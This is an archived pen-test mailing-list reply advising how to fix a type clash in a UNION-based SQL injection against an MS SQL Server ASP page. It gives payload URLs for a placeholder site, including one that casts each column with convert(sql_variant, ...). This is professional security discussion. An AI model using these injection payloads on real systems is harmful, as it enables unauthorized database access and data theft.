Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: SQL Injection: Issue with UNION SELECT ALL
From: "Zed Qyves" <zqyves.spamtrap () gmail com>
Date: Thu, 10 Jan 2008 09:54:54 +0200

Hello,

you seem to have successfully enumerated the number of fields of the
first query at
----------------------------------------------------------------------------------
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL 1,2,3--
       Returns:
       Operand type clash: text is incompatible with int

       Reference Found:
       http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html
--------------------------------------------------------------------------------

you can use the convert and sql_variant data type of MS SQL SERVER to
get to the right data types as well.

so you query would look like...

-------------------------------------------------------------------------------
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL convert(sql_variant,1),convert(sql_variant,2),convert(sql_variant,3)--

Reference:
       http://www.sqlsecurity.com/LinkClick.aspx?link=SQL+Server+Security.ppt&tabid=60&mid=398

-------------------------------------------------------------------------------

Have fun,
ZQ

-- 
---------------------------------------------------------------------
Κρέων
ἐν τῇδ᾽ ἔφασκε γῇ· τὸ δὲ ζητούμενον
ἁλωτόν, ἐκφεύγειν δὲ τἀμελούμενον.
Οιδίπους Τύρρανος [110]
---------------------------------------------------------------------
Creon
In this our land, so said he, those who seek  Shall find; unsought, we
lose it utterly.
Oedipus Rex [110]
---------------------------------------------------------------------

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault